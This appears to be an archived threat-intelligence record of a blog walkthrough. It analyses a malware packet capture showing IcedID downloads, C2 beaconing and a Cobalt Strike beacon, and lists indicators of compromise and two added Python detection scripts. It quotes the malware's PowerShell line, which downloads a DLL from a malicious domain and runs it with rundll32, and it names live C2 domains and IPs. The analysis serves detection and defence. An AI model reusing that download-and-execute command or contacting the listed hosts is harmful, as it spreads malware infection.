{
	"id": "0ce6131e-12d9-4b2e-9e1b-c35f4564f2fc",
	"created_at": "2026-04-06T01:29:31.970138Z",
	"updated_at": "2026-04-10T13:12:08.804526Z",
	"deleted_at": null,
	"sha1_hash": "37be476f12b6aeec889357490879bdba0e2c8231",
	"title": "Analysing a malware PCAP with IcedID and Cobalt Strike traffic",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 246375,
	"plain_text": "Analysing a malware PCAP with IcedID and Cobalt Strike traffic\r\nBy Erik Hjelmvik\r\nPublished: 2021-04-19 · Archived: 2026-04-06 01:22:10 UTC\r\nMonday, 19 April 2021 09:45:00 (UTC/GMT)\r\nThis network forensics walkthrough is based on two pcap files released by Brad Duncan on malware-traffic-analysis.net. The traffic was generated by executing a malicious JS file called StolenImages_Evidence.js in a sandbox environment.\r\nThe capture file starts with a DNS lookup for banusdona.top, which resolved to 172.67.188.12, followed by an HTTP GET request for \"/222g100/index.php\" on that domain. The following PowerShell oneliner is returned in the HTTP response from banusdona.top:\r\n$path = $Env:temp+'\\JwWdx.dat'; $client = New-Object Net.WebClient;\r\n$client.downloadfile('http://banusdona.top/222g100/main.php',$path); C:\\Windows\\System32\\rundll32.exe $path,DllRegisterServer\r\nThis oneliner instructs the initial dropper to download a Win32 DLL payload from http://banusdona[.]top/222g100/main.php, save it as \"JwWdx.dat\" in the user's temp directory and then run the DLL with:\r\nrundll32.exe %TEMP%\\JwWdx.dat,DllRegisterServer\r\nCalling the DllRegisterServer export through rundll32.exe is a common way to execute a malicious DLL under a signed, trusted Windows binary, so the rundll32 command line itself is worth alerting on when it points into a temp directory.\r\nAs you can see in the screenshot below, the HTTP response for this second request to banusdona.top has Content-Type \"application/octet-stream\", but also a conflicting Content-Disposition header of \"attachment;filename=data.jpg\", which indicates that the file should be saved to disk as \"data.jpg\". 
Nevertheless, the \"MZ\" header in the transferred data reveals that the downloaded data wasn't an image, but a Windows binary (dll or exe).\r\nhttps://netresec.com/?b=214d7ff\r\nPage 1 of 10\n\nImage: CapLoader transcript of IcedID malware download\r\nThe downloaded file gets extracted from the pcap file by NetworkMiner as \"data.jpg.octet-stream\".\r\nImage: Files extracted from PCAP by NetworkMiner\r\nRight-clicking \"data.jpg.octet-stream\" in NetworkMiner and selecting \"Calculate MD5...\" brings up a new window with additional file details, such as MD5 and SHA hashes of the reassembled file.\r\nMD5: f98711dfeeab9c8b4975b2f9a88d8fea\r\nSHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb\r\nSHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c\r\nThis file is available on VirusTotal, where we can see that it's a DLL that several AV vendors identify as \"Cerbu\" or \"IcedID\". VirusTotal's C2AE sandbox analysis of the DLL also reveals the domain name \"momenturede.fun\" in the process' memory. As you might expect, a connection is made to that domain just a few seconds later. 
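The mismatch between the filename claimed in Content-Disposition and the MZ header in the body is something a proxy-log post-processor or IDS script can test mechanically. The Python below is an added example written for this walkthrough; it is not code from the original post, from NetworkMiner or from CapLoader. It parses a raw HTTP response, reads the filename= parameter of Content-Disposition, sniffs the leading bytes of the body and reports when the claimed type and the actual type disagree. The two sample responses are constructed for illustration (one resembling the transfer described above, with an octet-stream Content-Type, filename=data.jpg and an MZ body; one benign JPEG), and the signature table is an illustrative assumption rather than a complete one.

```python
import hashlib

# CRLF built from byte values so the script contains no escape sequences.
CRLF = bytes([13, 10])

# Leading-byte signatures for a few common types (illustrative table, not exhaustive).
MAGIC = {
    b'MZ': 'pe',                        # Windows PE image (exe or dll)
    bytes([0xFF, 0xD8, 0xFF]): 'jpeg',
    bytes([0x89, 0x50, 0x4E, 0x47]): 'png',
    b'GIF8': 'gif',
    b'%PDF': 'pdf',
    b'PK' + bytes([3, 4]): 'zip',
}

# What a given claimed file extension should carry.
EXT_TYPE = {
    'jpg': 'jpeg', 'jpeg': 'jpeg', 'png': 'png', 'gif': 'gif',
    'pdf': 'pdf', 'zip': 'zip', 'dll': 'pe', 'exe': 'pe',
}


def split_response(raw):
    # Split an HTTP/1.x response into status line, lower-cased header dict and body.
    head, _, body = raw.partition(CRLF + CRLF)
    lines = [line.decode('latin-1') for line in head.split(CRLF)]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def declared_filename(headers):
    # Return the filename= parameter of Content-Disposition, or None if absent.
    for part in headers.get('content-disposition', '').split(';'):
        key, _, value = part.strip().partition('=')
        if key.strip().lower() == 'filename':
            return value.strip().strip(chr(34))   # chr(34) is the double-quote character
    return None


def sniff(body):
    # Identify the body by its leading bytes.
    for signature, kind in MAGIC.items():
        if body.startswith(signature):
            return kind
    return 'unknown'


def analyse(raw):
    # Compare the type implied by the claimed filename with the type implied by the bytes.
    status, headers, body = split_response(raw)
    name = declared_filename(headers)
    ext = name.rsplit('.', 1)[-1].lower() if name and '.' in name else None
    claimed = EXT_TYPE.get(ext)
    actual = sniff(body)
    return {
        'status': status,
        'filename': name,
        'content_type': headers.get('content-type'),
        'claimed_type': claimed,
        'actual_type': actual,
        'mismatch': claimed is not None and claimed != actual,
        'executable': actual == 'pe',
        'size': len(body),
        'sha256': hashlib.sha256(body).hexdigest(),
    }


def build_response(content_type, disposition, body):
    # Assemble a minimal HTTP/1.1 response for the samples below.
    head = CRLF.join([
        b'HTTP/1.1 200 OK',
        b'Content-Type: ' + content_type,
        b'Content-Disposition: ' + disposition,
        b'Content-Length: ' + str(len(body)).encode(),
    ])
    return head + CRLF + CRLF + body


# Constructed samples, not bytes from the PCAP: a fake DOS stub behind an MZ header, and a JPEG.
MALICIOUS = build_response(b'application/octet-stream', b'attachment;filename=data.jpg',
                           b'MZ' + bytes(62) + b'This program cannot be run in DOS mode.' + bytes(200))
BENIGN = build_response(b'image/jpeg', b'inline; filename=photo.jpg',
                        bytes([0xFF, 0xD8, 0xFF, 0xE0]) + b'JFIF' + bytes(200))

if __name__ == '__main__':
    for label, sample in (('malicious', MALICIOUS), ('benign', BENIGN)):
        print(label, analyse(sample))
```

The same check can be run over files NetworkMiner has already carved (read the file, skip the header parsing) and the reported sha256 compared against the hashes listed further down; a body that sniffs as pe while the response claims an image is a strong triage signal on its own, before any sandbox or VirusTotal lookup.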
A nice overview of these connections can be seen in CapLoader's Flow tab.\r\nImage: CapLoader showing initial flows from the IcedID malware execution\r\nThe momenturede.fun server returns a 500kB file, which NetworkMiner extracts from the pcap file as \"index.gzip\".\r\nMD5: 96a535122aba4240e2c6370d0c9a09d3\r\nSHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8\r\nSHA256: 3d1b525ec2ee887bbc387654f6ff6d88e41540b789ea124ce51fb5565e2b8830\r\nThis turns out to be an encrypted IcedID DLL file, which has been analyzed by Ali Aqeel here:\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nRight after the IcedID download we see a series of HTTPS connections towards odd domains like vaccnavalcod.website, mazzappa.fun, ameripermanentno.website and odichaly.space, all of which resolved to IP 83.97.20.176. That host is most likely a command-and-control (C2) server used by the IcedID malware.\r\nCapLoader's \"Services\" tab also reveals that the TLS connections to port 443 on 83.97.20.176 are very periodic, with a new connection every 5 minutes. Periodic connection patterns like this are a typical indicator of C2 traffic, where the malware agent connects back to the C2 server at regular intervals to check for new tasks.\r\nImage: CapLoader's Services tab showing that the IcedID malware agent connects to the C2 server every 5 minutes (00:05:01).\r\nThe traffic to 83.97.20.176 is encrypted, so we can't inspect the payload to verify whether or not it is IcedID C2 communications. 
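CapLoader's Services tab surfaces the 5-minute cadence visually; the same test can be scripted over flow records from any sensor, which is useful when there is no analyst looking at a GUI. The script below is an added example written for this page, not code from the original post or from CapLoader. It groups flows by destination service, computes the gaps between successive connection start times and flags services whose gaps are both numerous and nearly constant (low coefficient of variation). The flow records are constructed for illustration: twelve connections to 83.97.20.176:443 about 301 seconds apart with sub-second jitter, plus irregular traffic to the TEST-NET address 203.0.113.5, which stands in for ordinary browsing. The thresholds min_connections and max_cv are assumptions to be tuned per environment.

```python
import statistics
from collections import defaultdict


def sample_flows():
    # Constructed flow records (start time in seconds, destination IP, destination port);
    # not taken from the PCAP discussed above.
    flows = []
    base = 1000.0
    for i in range(12):
        # beacon: one connection roughly every 301 s with sub-second jitter
        flows.append((base + i * 301.0 + (i % 3) * 0.4, '83.97.20.176', 443))
    for t in (1010.0, 1020.5, 1500.0, 1515.2, 2400.0, 2401.0, 3100.0):
        # background traffic to an unrelated host at irregular times
        flows.append((t, '203.0.113.5', 443))
    return sorted(flows)


def periodicity(flows, min_connections=6, max_cv=0.1):
    # Score each (ip, port) service: number of connections, the typical gap between
    # them, and the coefficient of variation of the gaps (stdev / mean). Many
    # connections with a low CV is the regular check-in pattern of a C2 agent.
    by_service = defaultdict(list)
    for start, ip, port in flows:
        by_service[(ip, port)].append(start)
    report = {}
    for service, times in by_service.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float('inf')
        report[service] = {
            'connections': len(times),
            'median_interval': statistics.median(gaps),
            'cv': cv,
            'periodic': cv <= max_cv,
        }
    return report


def beacon_candidates(flows, **kw):
    # Services that pass the periodicity test, most regular first.
    report = periodicity(flows, **kw)
    hits = [(svc, r) for svc, r in report.items() if r['periodic']]
    return sorted(hits, key=lambda item: item[1]['cv'])


if __name__ == '__main__':
    for (ip, port), r in beacon_candidates(sample_flows()):
        print(ip, port, r['connections'], 'connections, median gap',
              round(r['median_interval'], 1), 's, cv', round(r['cv'], 4))
```

Two caveats when using this on real captures. Agents are often configured with sleep jitter (Cobalt Strike exposes sleep time and jitter in the beacon configuration, which 1768.py prints), so a beacon with 30 percent jitter will need a looser max_cv than the near-constant 00:05:01 seen here. And legitimate software polls too (update checks, mail clients, telemetry), so a periodic service is a triage lead to combine with the destination's reputation, certificate and JA3 details, not a verdict by itself.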
What we can do, however, is extract the HTTPS server's X.509 certificate and the JA3 hash of the client's TLS implementation from the encrypted traffic.\r\nNetworkMiner has extracted the X.509 certificates for vaccnavalcod.website, mazzappa.fun, ameripermanentno.website and odichaly.space to disk as \"localhost.cer\".\r\nIt turns out that all these sites used the same self-signed certificate, which had SHA1 fingerprint 452e969c51882628dac65e38aff0f8e5ebee6e6b. The X.509 certificate was created using OpenSSL's default values, such as \"Internet Widgits Pty Ltd\" etc. Further details about this certificate can be found on censys.io. Because the same certificate is presented no matter which of the four domains is contacted, its fingerprint is a more specific indicator for this infrastructure than the client-side JA3 hashes discussed next.\r\nThe JA3 hashes used by the IcedID malware agent can be found in NetworkMiner's Hosts tab as well as in the Parameters tab.\r\nImage: NetworkMiner's Parameters tab with keyword filter \"JA3 Hash\"\r\nThe JA3 hashes for the client that connects to the C2 server are a0e9f5d64349fb13191bc781f81f42e1 and 3b5074b1b5d032e5620f69f9f700ff0e. Several legitimate Windows applications unfortunately have the same JA3 hashes, so we can't use them to uniquely identify the IcedID agents.\r\nThe IcedID C2 traffic continues for over 19 hours, at which point we suddenly see a connection to a new suspicious domain called \"lesti.net\" on 185.141.26.140. The first HTTP request to that domain is used to download a 261703 byte file, as can be seen in this Flow Transcript from CapLoader.\r\nNetworkMiner extracts this file as \"9r8z.octet-stream\". 
This turns out to be a Cobalt Strike beacon download, which we can decode with Didier Stevens' fantastic 1768.py script.\r\nThe output from 1768.py reveals that this Cobalt Strike beacon is using the following URIs for C2 communication:\r\nGET URI: http://lesti[.]net/userid=\r\nPOST URI: http://lesti[.]net/update.php\r\nWe can also see that the Cobalt Strike license-id (a.k.a. watermark) is 1580103814. This ID can be used to link this Cobalt Strike beacon to other campaigns. Note that a watermark identifies a Cobalt Strike license rather than an operator: a leaked or cracked copy can be shared by several unrelated groups, so such links are leads for further investigation rather than attribution on their own. Below is a list of Cobalt Strike C2 servers using license-id 1580103814 discovered by Tek in December 2020:\r\n45.147.229[.]157\r\nselfspin[.]com\r\nsavann[.]org\r\npalside[.]com\r\nserver3.msadwindows[.]com\r\nmapizzamates[.]com\r\nfixval[.]com\r\nrackspare-technology[.]download\r\n108.177.235[.]148\r\nmatesmapizza[.]com\r\nUpdate 4 May 2021\r\nSergiu Sechel published a blog post yesterday, which included a list of Cobalt Strike C2 servers. We fed this list to Tek's scan_list.py script in order to see if license-id 1580103814 is still active. It turned out it was. We found the following 27 domains and IPs running Cobalt Strike C2 servers on TCP 443 using that license-id.\r\n151.236.14[.]53\r\n151.236.14[.]53\r\n172.241.27[.]70\r\n193.29.13[.]201\r\n193.29.13[.]201\r\n193.29.13[.]209\r\n194.165.16[.]60\r\n193.29.13[.]209\r\n193.29.13[.]201\r\n194.165.16[.]60\r\n194.165.16[.]60\r\ndain22[.]net\r\ndrellio[.]com\r\nfeusa[.]net\r\nfut1[.]net\r\nhelle1[.]net\r\nhars2t[.]com\r\nkasaa[.]net\r\nidxup[.]com\r\nmaren2[.]com\r\nmgfee[.]com\r\nmassflip[.]com\r\noaelf[.]com\r\nrepdot[.]com\r\nscalewa[.]com\r\ntulls[.]net\r\nwellser[.]org\r\nThe full output from our re-scan of Sergiu's C2 list can be found on pastebin.\r\nUpdate 8 May 2021\r\nSecurity researcher Michael Koczwara is tracking Cobalt Strike license 1580103814 as APT actor LuckyMouse (a.k.a. Emissary Panda or APT 27). 
Michael's Cobalt Strike C2 dataset, which currently contains 25 unique C2 IPs and domains for license-id 1580103814, is available as a Google Docs spreadsheet (see the \"LuckyMouse Actor\" tab).\r\nIndicators of Compromise - IOCs\r\nMD5: 8da75e1f974d1011c91ed3110a4ded38\r\nSHA1: e9b5e549363fa9fcb362b606b75d131dec6c020e\r\nSHA256: 0314b8cd45b636f38d07032dc8ed463295710460ea7a4e214c1de7b0e817aab6\r\nDNS: banusdona.top\r\nIP: 172.67.188.12\r\nMD5: f98711dfeeab9c8b4975b2f9a88d8fea\r\nSHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb\r\nSHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c\r\nDNS: momenturede.fun\r\nIP: 104.236.115.181\r\nMD5: 96a535122aba4240e2c6370d0c9a09d3\r\nSHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8\r\nMD5: 11965662e146d97d3fa3288e119aefb2\r\nSHA1: b63d7ad26df026f6cca07eae14bb10a0ddb77f41\r\nSHA256: d45b3f9d93171c29a51f9c8011cd61aa44fcb474d59a0b68181bb690dbbf2ef5\r\nDNS: vaccnavalcod.website\r\nDNS: mazzappa.fun\r\nDNS: ameripermanentno.website\r\nDNS: odichaly.space\r\nIP: 83.97.20.176\r\nSHA1: 452e969c51882628dac65e38aff0f8e5ebee6e6b\r\nDNS: lesti.net\r\nIP: 185.141.26.140\r\nMD5: 449c1967d1708d7056053bedb9e45781\r\nSHA1: 1ab39f1c8fb3f2af47b877cafda4ee09374d7bd3\r\nSHA256: c7da494880130cdb52bd75dae1556a78f2298a8cc9a2e75ece8a57ca290880d3\r\nCobalt Strike Watermark: 1580103814\r\nNetwork Forensics Training\r\nAre you interested in learning more about how to analyze captured network traffic from malware and hackers? Have a look at our network forensic trainings. Our next class is a live online event called PCAP in the Morning.\r\nPosted by Erik Hjelmvik on Monday, 19 April 2021 09:45:00 (UTC/GMT)\r\nTags: #Cobalt Strike#CobaltStrike#IcedID#NetworkMiner#CapLoader#Network Forensics#JA3#X.509#1768.py#a0e9f5d64349fb13191bc781f81f42e1#3b5074b1b5d032e5620f69f9f700ff0e\r\nSource: https://netresec.com/?b=214d7ff",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://netresec.com/?b=214d7ff"
	],
	"report_names": [
		"?b=214d7ff"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775438971,
	"ts_updated_at": 1775826728,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/37be476f12b6aeec889357490879bdba0e2c8231.pdf",
		"text": "https://archive.orkl.eu/37be476f12b6aeec889357490879bdba0e2c8231.txt",
		"img": "https://archive.orkl.eu/37be476f12b6aeec889357490879bdba0e2c8231.jpg"
	}
}